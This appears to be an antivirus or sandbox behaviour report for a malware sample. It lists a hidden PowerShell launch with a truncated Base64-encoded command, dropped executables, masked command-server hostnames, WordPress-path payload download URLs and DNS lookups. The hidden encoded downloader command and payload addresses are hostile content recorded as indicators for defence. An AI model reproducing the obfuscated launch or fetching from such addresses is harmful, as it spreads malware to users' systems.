Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHQAagBqAHQAdwByAGwAcwA9ACcAVABoAGUAawB3AGIAaQBmAHQAdgAnADsAJABXAHkAZwBoAGoAcgBxAHAAbQBzAHgAdwAgAD0AIAAnADIAMAAnADsAJABTAG8AeAB0AHkAaABlAGsAawA9ACcAUgBpAHcAZABzAGQAbABmAHAAeAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1564
- %TEMP%\1181364.cvr
- %HOMEPATH%\20.exe
- %HOMEPATH%\20.exe
- %HOMEPATH%\20.exe
- 'cg.##twp.net':80
- 'pa######s.azurewebsites.net':80
- 'bl##.#1cool.club':80
- 'je####ink.com.au':443
- http://cg.##twp.net/wp-admin/b56-cf7ycs7-853921/
- http://pa######s.azurewebsites.net/wp-admin/sqTIPlE/
- 'je####ink.com.au':443
- DNS ASK cg.##twp.net
- DNS ASK pa######s.azurewebsites.net
- DNS ASK bl##.#1cool.club
- DNS ASK je####ink.com.au
- DNS ASK de.###beat.guide